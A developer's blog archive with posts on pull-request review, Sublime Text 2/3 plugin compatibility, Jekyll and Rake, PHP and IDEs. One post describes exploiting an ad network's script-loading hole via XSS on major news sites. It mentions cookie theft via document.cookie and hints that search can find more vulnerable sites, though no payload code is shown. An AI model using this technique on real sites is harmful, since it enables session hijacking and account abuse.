Why didn’t I respond to your pull request?

I have some fairly popular open source packages up on GitHub. Happily, I get people submitting pull requests, adding features or fixing bugs. It’s great when this happens, because people are doing work that I don’t want to do / haven’t gotten to yet / didn’t think of.

…but I’m pretty bad at responding to these. They tend to languish for a while before I get to them. There’s a decent number which I’ve never even replied to.

Why is this?

Fundamentally, it’s because reviewing a pull request is potentially a lot of work… and the amount of work isn’t necessarily obvious up-front. This means I only tend to do reviews for anything which isn’t obviously trivial when I’m feeling energetic and like I have a decent amount of free time.

First, there’s some common potential problems which might turn up:

  1. It does something I don’t want to include in the project. This is the only outright deal-breaker. Project owner’s prerogative.

  2. It doesn’t work. This happens more often than you’d think, generally because the submitter has written code for the exact use-case they had, and hasn’t considered what will happen if someone tries to use it in a different way.

  3. It works, but not in the way I want it to. For instance, it might behave inconsistently with existing features, and I’d want it adjusted to match.

  4. It should be written differently. This tends to include feedback like “you should use this module” / “this code should really go over here” / “this duplicates code”.

  5. It has coding style violations. Things like indentation, variable names, or trailing whitespace. These aren’t functional problems, but I still don’t want to merge them, because I’d just have to make another commit to fix them myself.

Once I’ve read the patch and given this feedback, which might itself take a while since design feedback and proper testing that exercises all code paths isn’t necessarily quick, I’ll respond asking for changes. Then there’s an unknown wait period while the submitted finds time to respond to those changes. Best-case for me, they agree with everything I said, make all requested changes perfectly, and update their pull request with them! Alas, people don’t always think I’m a font of genius, so there’s an unknowable amount of back-and-forth needed to find a compromise position we both agree on. This generally involves enough time between responses that the specifics of the patch aren’t in my head any more, so I have to repeat the review process each time.

What can I do better?

One obvious fix: delegate more. Accept more people onto projects and give them commit access, so I don’t have to be the bottleneck. I’m bad at doing this, because my projects tend to start as “scratch my itch” tasks, and I worry about them drifting away from code I’m personally happy with. Plus, I feel that if the problem is “I don’t review patches promptly”, “make someone else do it instead” is perhaps disingenuous as a response. 😀

So, low-hanging fruit…

Coding style violations, despite being trivial, are probably the most common sources of a patch sitting unmerged as I wait for someone to respond to a request to fix them. This is kind of my fault, because I have a bad habit of not documenting the coding style I expect to be used in my projects, relying on people writing consistent code by osmosis. Demonstrably, this doesn’t work.

As such, I’m starting to add continuous integration solutions like Travis to my projects. Without any particular work on my part, this lets me automatically warn contributors about coding style concerns which can be linted for, via tools like flake8 or editorconfig. If their editing environment is set up for it, they’ll get feedback as they write their patch… and if not, they’ll be told on GitHub when a pull request fails the tests, and don’t have to wait for me to get back to them about it.

Build Status

The “it doesn’t work” issue can be worked into this framework as well, with a greater commitment to writing tests on my part. If my project is already well-covered, I can have the CI build check test coverage, and thus require that contributors are providing tests that cover at least most of what they’re submitting, and don’t break existing functionality.

This should reduce me to having to personally respond to a smaller set of “how should this be written?” issues, which I think will help.

Sublime Text packages: working in 2 and 3

I maintain the Git package for Sublime Text. It’s popular, which is kind of fun and also occasionally stressful. I recently did a major refactor of it, and want to share a few tips.

I needed to refactor it because, back when the Sublime Text 3 beta came out, I had made a branch of the git package to work with ST3, and was thus essentially maintaining two versions of the package, one for each major Sublime version. This was problematic, because all new features needed to be implemented twice, and wound up hurting my motivation to work on things.

Why did I feel the need to branch the package? Well…

The Problem

Sublime Text is currently suffering from a version problem. There’s the official version, Sublime Text 2, and the easily available beta version, Sublime Text 3. They’re both in widespread use. This division has ground on for around three years now, and is a pain to deal with.

It’s annoying, as a plugin developer, because of a few crucial differences:

Sublime Text 2:

  • Uses Python 2.7.
  • Puts all package contents into a shared namespace.

Sublime Text 3:

  • Uses Python 3.3.
  • Puts all package contents into a module named for the package.
  • Has some new APIs, removes some old APIs.

…yes, the Sublime Text 2 / 3 situation is an annoyingly close parallel to the general Python 2 / 3 situation that is itself a subset of the Sublime problem. I prefer less irony in my life.

Python

What changed in Python 3 is a pretty well-covered topic, which I’m not going to go into here.

Suffice it to say that the changes are good, but introduce some incompatibilities which need code to be carefully written if it wants to run on both versions.

Imports

If your plugin is of any size at all, you probably have multiple files because separation of code into manageable modules is good. Unfortunately, the differing way that packages are treated in ST2 vs ST3 makes referring to these files difficult.

In Sublime Text 2, all files in packages are in a great big “sublime” namespace. Any package can import modules from any other package, perhaps accidentally.

For instance, in ST2…

…gets us the Default.comment module, which provides the built-in “toggle comment on a line” functionality. Unless some other package has a comment.py, in which case who what we’ll get becomes order-of-execution dependent.

Note the fun side-effect of this: if any package has a file which shares a name with anything in the standard library, it’ll “shadow” that and any other package which then tries to use that part of the standard library will break.

Because of these drawbacks, Sublime Text 3 made the very sensible decision to make every package its own module. That is, to get that comment module, we need to do:

This is better, and makes it harder to accidentally break other packages via your own naming conventions. However, it does cause compatibility problems in two situations:

  1. You want to access another package
  2. You want to use relative imports to access files in your own package

The latter case, this is something which behaves differently depending on whether you’re inside a module or not.

Editing text

In Sublime Text 2 you had to call edit = view.begin_edit(...) and view.end_edit(edit) to group changes you were making to text, so that undo/redo would bundle them together properly.

In Sublime Text 3, these were removed, and any change to text needs to be a sublime_plugin.TextCommand which will handle the edit-grouping itself without involving you.

The Solution (sort of)

If you want to write a plugin that works on both versions, you have to write Python that runs on 2 and 3, and has to play very carefully around relative imports.

Python 2 / 3

A good first step here is to stick this at the top of all your Python files:

This gets Python 2 and 3 mostly on the same page; you can largely just write for Python 3 and expect it to work in Python 2. There’s still some differences to be aware of, mostly in areas where the standard library was renamed, or when you’re dealing with points where the difference between bytes and str actually matters. But these are workable-around.

For standard library reshuffling, checking exceptions works:

If your package relies on something which changed more deeply, more extensive branching might be required.

Imports

If you want to access another module, as above, this is a sensible enough place to just check for exceptions.

You could check for the version of Sublime, of course, but the duck-typing approach here seems more Pythonic to me.

When accessing your own files, what made sense to me was to make it consistent by moving your files into a submodule, which means that the “importing a file in the same module” case is all you ever have to think about.

Thus: move everything into a subdirectory, and make sure there’s an __init__.py within it.

There’s one drawback here, which is that Sublime only notices commands that are in top-level package files. You can work around this with a my_package_commands.py file, or similar, which just imports your commands from the submodule:

There’s one last quirk to this, which only applies to you during package development: Sublime Text only reloads your plugin when you change a top-level file. Editing a file inside the submodule does nothing, and you have to restart Sublime to pick up the changes.

I noticed that Package Control has some code to get around this, so I copied its approach in my top-level command-importing file, making it so that saving that file will trigger a reload of all the submodule contents. It has one minor irritation, in that you have to manually list files in the right order to satisfy their dependencies. Although one could totally work around this, I agree with the Package Control author that it’s a lot simpler to just list the order and not lose oneself in metaprogramming.

Editing text

Fortunately, sublime_plugin.TextCommand exists in Sublime Text 2, with the same API signature as in Sublime Text 3, so all you have to do here is wrap all text-edits into a TextCommand that you execute when needed.

Conclusion

Getting a package working in Sublime Text 2 and 3 simultaneously is entirely doable, though there are some nuisances involved, which is appropriate given that “run in Python 2 and 3 simultaneously” is a subset of the problem. That said, if you do what I suggest here, it should largely work without you having to worry about it.

Raking Jekyll

I’ve never really touched rake before, but since switching to Jekyll I’m finding that it’s becoming an essential part of my workflow. In the limited area of blogging, at least.

rake is a version of make in which you define all your targets in Ruby. Because practically anything would be an improvement over Makefile syntax, this is pretty easy to work with. I’m not a huge fan of shell scripting at the best of times, so mixing it in with something else is… not desirable. I still find Ruby less intuitive than Python, but that’s my prejudices talking.

To elaborate… what does posting a new entry look like for me?

  1. rake server to start up an automatically-rebuilding local webserver copy of my blog
  2. rake post[raking-jekyll] to make a new post with the YAML front matter boilerplate
  3. Actually edit the newly created post in an editor
  4. rake deploy to rsync the local copy to my hosting over ssh

Any part of my routine which looks like it might be scriptable has been replaced with a rake target. For example, the post target:

  1. Copies a template file
  2. Names it according to the current date and provided title
  3. Adds an expanded version of the current date into its YAML front matter so sorting will work correctly if I post multiple times a day

Since I rarely know the current date without having to look it up, that certainly saves me some effort.

Here’s my Rakefile, if you want to use anything from it. It’s probably not properly idiomatic Ruby, but it does at least work.

XSS is fun!

Pretending innocence, I ask why all these high profile websites have their homepages covered in spinning images?

Okay, obviously enough, I’m messing with them. But how can I do that?

The answer is cross site scripting (“XSS”).

XSS is surprisingly common, and nigh-universally is caused by poorly escaped user inputs. Even user inputs which, as in this case, they obviously don’t think of as user inputs. It happens when content is injected into a page, which results in the loading of arbitrary JavaScript onto that page.

As such, I own your interaction with those sites. If I was malicious I could be harvesting your cookies from them, redirecting you to phishing sites, recording everything you type, or just snooping on everything you view. As an example of why someone might want to do this… in the case of these particular sites, stealing your cookies (document.cookie) would let me post comments as you. I could thus spam those sites using legitimate accounts that I don’t have to go through the hassle of creating myself.

I’m not doing this, because that wouldn’t be nice. All I’m doing is reversing links and spinning images, because I think that’s cute.

In this case, all these sites have screwed up by including a little bit of HTML from an ad network (EyeWonder) on their site. This HTML accepts an arbitrary URL as a parameter, and loads it in a <script> tag. This is quite a common way for ad networks to ruin your day, often in the name of “frame busting”.

If you’re wondering who might be vulnerable to this exact hole from this exact ad network, Google can help you with that. Hint: it’s a lot of sites. I just grabbed the first three big names to demonstrate with.

Here’s the offending HTML:

This would actually be pretty easy to fix, note. A little bit of checking of the input, to restrict it to scripts hosted only on known-trusted domains would be enough to make exploiting it almost impossible. (I say “almost” because someone sufficiently resourceful might find one of these “trusted” domains isn’t as secure as they hoped and slip a script onto it. But it at least raises the bar.)

If you’re curious what I’m doing to make these pages spin, check out this gist which includes the spinner script. Essentially it’s just making an iframe which shows the root of the domain, and then manipulates the contents of that iframe, which it’s allowed to do because the script is running on the same domain.

In short: never trust user input. Also, don’t trust your ad networks to know/care about security.

This post brought to you by my coworker Paul Banks pointing out the existence of this fun little hole on CNN. I then added the spinning myself, because it looks nice and spectacular.

Jekyll

I’ve just redone my website using Jekyll. It is now completely static. No PHP, no database, nothing like that.

Why did I do this?

  • It’s quite soothing knowing that all my content is version controlled.
  • I am now nigh-immune to traffic spikes. I was using caching with WordPress before, so it had never been an issue even when I was on the HN frontpage, but there’s some peace of mind in it.
  • WordPress had a history of security bugs which wasn’t comforting. Since nothing on this new site is executable I feel pretty secure now.
  • My site is now ridiculously flexible. Jekyll forces almost no structure on you, leaving you free to change things around as you please.

I’m happy with the end result, but the process of getting there was not without pain.

The initial difficulty came from Jekyll’s documentation being somewhat lacking. I found myself somewhat confused about minor details like “how does a layout work?”. After I’d cribbed that together by examining other sites posted with Jekyll, I discovered that the template data docs were inaccurate / misleading, implying the presence of a post variable which failed to exist. It turned out to be something that’s merged into page if you’re viewing a post.

I don’t completely blame Jekyll for this being opaque. Jekyll uses Liquid for its templating language, which claims to be aimed at designers… and I feel it would benefit from some sort of debugging mode that dumps the current scope for examination.

I resorted to reading Jekyll’s source, which cleared up a number of things. However, I view it as a bad sign that I felt I had to do this. Not that a command-line driven static website generator is ever likely to be a mainstream product, but still, it’s the principle of the thing.

Pagination worked, but was completely lacking in configuration. Since part of my goal was to have my URLs remain the same as they were in WordPress, I had to change this. I did so with a horrible monkey-patching hack of a plugin. Specifically, I made a copy of the pagination module from Jekyll’s core into my _plugins directory and selectively edited it to change the pagination urls.

In the process I noticed a bug in the core code, and submitted a pull request to fix it. So horrible monkey patching might at least pay off this time.

Also utterly broken was the related posts feature. No matter what, it always seems to think the most recent posts are the most related to anything. It’s possible that running with --lsi would have helped with this, via complex semantic analysis, but that takes forever and I’ve seen others complain that it doesn’t really help. So there’s more monkey patching going on via Lawrence Woodman’s related posts plugin, which I took and edited so it worked based on tags instead of categories.

One thing I haven’t fixed, which I’d like to, is making the automatic regeneration of your site during development / writing a lot smarter. Right now it notices a file has changed and so it regenerates every single bit of content on your site. This does mean that the live generated site always has recent/related posts up to date everywhere… but it’d be nice to have some sort of --quick option that ignored that stuff in favor of a faster development cycle.

Because of the utter staticness, I naturally cannot have my own comment system in use any more. So I’ve switched to Disqus, which adds commenting to the site via JavaScript. It feels sort of weird to be outsourcing a component of my user experience like this… but they seem to be trustable. Widely used, and their monetization plan is fairly transparent.

If you’re interested you can see the repo for my website on github. It contains, in its default / post templates, markup that’s compatible with any WordPress theme that’s based on Toolbox, which might be of use to some.

Like I said, I’m happy with how it turned out. I wouldn’t recommend this at all for a non-technical person, but if you want to dig in and get your hands dirty then Jekyll is quite workable.

To replace PHP you need

(Expanding slightly on my response to this HN thread.)

First: to be on all shared hosting everywhere. I.e. you need to be really easy to install, and preferably not involve long-running processes that shared hosts might choke on.

Second: to be beginner friendly. No requirement of understanding MVC, or running commands in a shell (hi RoR!). Pure instant gratification. Someone’s first step into using PHP is likely going to be “I want the current date in the footer of my page”, or “I want a random image on my homepage”, or something like that. Anything like that you can handle by taking your existing page and dropping a tiny snippet in where you want the change to happen. is a potent thing to someone who has never programmed before.

Note: For point 2 many of the things serious programmers hate about PHP are actually advantages. All the functions in one big namespace? That’s great! A newbie doesn’t have to try to understand .

It’s easy to replace PHP for serious developers. We like advanced features, and care about a sane default library. We’re willing to use complex tools to get a payoff.

It’s hard to replace PHP for non-programmers who just want to tweak their static page in notepad so it has one cool new feature, or install a blogging package on their cheapo shared hosting.

To sum up: if you don’t address both of these points then you haven’t killed PHP. You’re competing with Python or Ruby or whatever. PHP will carry right on ignoring you, because you’re not addressing its fundamental use case.

Why not just use an IDE if you want IDE features?

After I posted about my Sublime Text 2 git plugin I got one response which I thought was worth responding to.

That looks helpful, but I often wonder why not just use an IDE if you want IDE features.

Obviously I have a bias here, but I’ll try to be fair to IDEs…

An IDE is an editor that does a lot of things, many of them well. If there’s something you want to do it’ll almost certainly let you do it, but if you’re not happy with some basic element of how it works then you’re stuck having to find a new IDE. (Yes, I know, many IDEs have plugins available, but I’ve never had that much luck with them.)

IDEs also tend to be built with a workflow in mind. If you conform to that workflow then they’ll be good to you, but you want to deviate from it you may have to fight with your tools.

A lightweight-but-extensible editor (e.g. Sublime, TextMate, vi, and so on) tends to focus on having a really good editing experience. So you start with good editing, and then you pick and choose the “IDE features” that you want to mix in. If part of the editor doesn’t work how you want you might have to find a new plugin for it, but since it’s not a massive and complicated system it’s likely to be easier to find that plugin.

Neither is necessarily better, but they do tend to appeal to different types of developer. Web developers, needing to work with a number of different file types, and not generally having complicated build system requirements, gravitate towards the lightweight editors.

UPDATE: To be clear, I’m not saying either is better. It’s a matter of personal choice and situation. As someone who mostly does web development in dynamic languages, I like using a fairly lightweight editing environment. If I wrote in Java I’m sure I’d be singing the praises of IntelliJ/Eclipse/whatever, because I understand that Java is almost impossible to write well without an IDE.

Sublime Text 2 git plugin

I wrote a git plugin for Sublime Text 2.

I’d decided to try Sublime out for work to see how it compared to TextMate… and thus some degree of git integration was required. Given that it’s been out since January, I was surprised that there wasn’t already a solid git plugin.

I did find this one, admittedly, but I decided that I didn’t like how it fit in with Sublime. It’s built around menus and keybinds, whereas I felt that setting everything up as commands in the palette and hooking as much stuff as I could into the fuzzy search was the way to go.

Working on the plugin was a good exercise in getting me used to Sublime. I’m fairly sold on it as a result. It’s philosophically somewhat similar to TextMate, but with some of TextMate’s rough edges smoothed out.

(Short rant: if the recently announced TextMate2 alpha doesn’t get rid of the single-character undo buffer… I don’t know what I’ll do. It’s certainly the biggest single complaint I have about TextMate nowadays.)